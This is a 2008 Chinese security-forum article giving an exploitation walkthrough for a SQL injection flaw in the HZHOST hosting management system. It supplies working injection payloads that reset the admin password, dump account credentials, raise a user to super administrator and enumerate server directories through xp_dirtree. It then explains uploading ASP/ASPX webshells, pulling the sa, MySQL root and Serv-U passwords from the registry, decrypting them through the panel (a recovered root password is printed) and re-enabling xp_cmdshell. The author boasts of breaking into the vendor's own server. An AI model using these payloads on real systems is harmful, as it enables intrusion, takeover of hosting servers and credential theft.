首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
HZHOST域名虚拟主机管理系统sql注射漏洞(更新)
来源:www.xxbing.com 作者:叉叉兵 发布时间:2008-12-28  

作者:叉叉兵
blog:www.xxbing.com

这是一个域名主机实时管理系统。在百度搜索: title: (域名主机实时管理系统) ,会找到大量采用这种系统的网站!太术语了。就是在线开通ftp.sql.web的一个管理系统。一套web程序。和IIS管理程序。实现在线开通的玩意。所以:我们可以免费申请域名和空间!!哈哈!!!

web程序方面写的非常严谨。大量的过滤。由于是商业版的程序,所以我没有源码。本来是有的,但是放在家里的电脑上。放暑假时搞的shell现在都被删了。。。我现在又比较懒,就没去弄源代码。反正大家知道怎么弄的就行了。

这又是一个文本框的注射。我真不知道作者是怎么想的。其他地方都被过滤了。就留下域名管理这里没过滤。

 

1.jpg
大小: 102.57 K
尺寸: 500 x 334
浏览: 9 次
点击打开新窗口浏览全图

 

 

2.jpg
大小: 77.34 K
尺寸: 500 x 292
浏览: 5 次
点击打开新窗口浏览全图

 

 

3.jpg
大小: 67.94 K
尺寸: 500 x 153
浏览: 8 次
点击打开新窗口浏览全图

 

官方放暑假的时候就被我搞了一遍,过了一个月他发现了。删了我的shell。不知道他怎么知道我从那里下的手搞的他。他居然补了漏洞。先上图,再说下利用方法。

  1. 123' UPDATE [memlst] SET u_pss='e10adc3949ba59abbe56e057f20f883e' WHERE u_nme='admin'-- 

 

这一句是把用户admin的密码修改为123456。管理员的后台地址一般是http://www.xx.com/master
或者直接在首页登陆了按切换到管理员后台。

 

4.jpg
大小: 17 K
尺寸: 500 x 116
浏览: 3 次
点击打开新窗口浏览全图

 

如果admin不是超级管理员,那就有三个办法。

一是自己构造语句爆出来。
二是提升自己注册的用户的权限。
三是直接爆网站路径,再来个差异备份。

第一个方法我给出一条示范语句:

  1. 123' and (select top 1 isnull(cast([u_nme] as nvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss] as nvarchar(4000)),char(32)) from (select top 2u_nme,U_pss from [hzhost]..[memlst] where 1=1 order by [u_nme]) t order by [u_nme] desc )>0-- and '1'='

 

可以同时爆出一个用户的帐号和密码。想爆出其他用户的语句自己构造吧。

第二个方法是:

  1. 123' UPDATE [memlst] SET u_sys=6 WHERE u_nme='你注册的用户名'--  
  2. 123' UPDATE [memlst] SET u_pwr=2 WHERE u_nme='你注册的用户名'-- 

 

这2句话就能够提升自己为超级管理员

第三个方法很麻烦。但是很有效果。直捣黄龙。。很强大。我给出如下语句,大家自己研究去吧!

  1. 爆路径语句  
  2. 第一步:建立表123' ;drop table foofoofoo;create table foofoofoo([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);-- and '1'='1  
  3. 第二步:123' ;declare @z nvarchar(4000) set @z=0x63003a005c00 insert foofoofoo execute master..xp_dirtree @z,1,1-- and '1'='1  
  4. 注意:0x63003a005c00 = C:\  为sql ENCODE  
  5. 其他的自己找工具去转吧!  
  6. 第三步:暴出总数 123' and (select cast(count(*) as varchar(8000))+char(94) from foofoofoo)>0-- and '1'='1  
  7. 第四步:暴出你想要的文件夹名字和文件名字 123' and 0<(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top  1 * from foofoofoo order by isfile,name) t order by isfile desc,name desc)-- and '1'='1  
  8. 修改中间红色的1,依次爆出。 

 

至于差异备份语句。让nbsi3告诉你吧。

 

对HZHOST域名虚拟主机管理系统sql注射漏洞进一步利用!

我记得还有2篇关于hzhost的漏洞利用文章。名字不记得了。大家去搜索“hzhost漏洞”找找吧!里面提到下面两点内容!

1。是提到c:\windows\temp下有hzhost主机留下的ftp登陆记录。有用户名和密码
2。是利用hzhost拿系统主机最高权限的。

安装了hzhost的主机,其mssql sa密码,mysql root密码还有serv-u的administrator密码全部保存在注册表中。位置在

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass
HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpass

经过了hzhost自己的加密方式,象

eLVClO4tzsKBf#dee52443a3872cc159

这样的字符串。不过在hzhost后台可以还原!拿到了sa密码,或者root密码,最高权限就在眼前!禁止了w.s的话。大家就传aspx木马导撒!

我们传了一个asp木马上去后。在incs\constr.asp下面可以看到数据库连接串。然后连接到数据库。通过执行

SELECT * FROM [hstlst]

语句。可以看到很多主机记录。如图

 

1.jpg
大小: 118.03 K
尺寸: 500 x 169
浏览: 2 次
点击打开新窗口浏览全图

 

发现什么没有?h_ftppass的密码和hzhost主机自己的加密串很相似。没错,主机管理的密码也是经过他自己的加密方式加了密!而我们在主机管理的地方!

 

2.jpg
大小: 115.04 K
尺寸: 500 x 204
浏览: 2 次
点击打开新窗口浏览全图

 

看到明文密码。说明他又给还原回来了。明白了么?我们先通过aspx木马导出mysql,mssql的root,sa密码加密串后。

 

3.jpg
大小: 76.53 K
尺寸: 500 x 128
浏览: 2 次
点击打开新窗口浏览全图

 

我们通过这条语句,修改别人的主机密码。

UPDATE [hstlst] SET h_ftppss='aPWw3j4zMaK83lHMBof9fc298b1d3d0a' WHERE h_ID=10000471

然后回过头去看主机密码。(这时候被转成了明文)

 

4.jpg
大小: 61.1 K
尺寸: 500 x 173
浏览: 1 次
点击打开新窗口浏览全图

 

就拿到了root密码为:sphil_070921注意:由于有多种限制。我截的图可能不是很完美。但是此方法绝对可行。这方法是看到别人写的[利用hzhost取得最高权限]得到的启发。谢谢他。

我们也可以同样拿到sa密码,用sa帐号密码远程连接,直接恢复xp_cmdshell就可以执行系统命令了!

好了。就此结束!期待牛人写出还原密码程序!!这样就不用麻烦了!

QQ:178737315


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Symbian系统新漏洞:"Curse Of Si
·opera 9.52使用ajax读取本地文件
·Microsoft SQL Server sp_replwr
·开心网(kaixin001.com) XSS漏洞
·Myspace中国 博客跨站漏洞
·PHPWIND & DISCUZ! CSRF漏洞
·IE7漏洞公告0day
·搜狐博客/博客大巴 日志模块XSS
·Discuz! 1_modcp_editpost.tpl.p
·再爆hzhost6.5虚拟主机管理系统
·PHP popen()函数缓冲区溢出漏洞
·Yahoo webmail xss&OWA xss
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved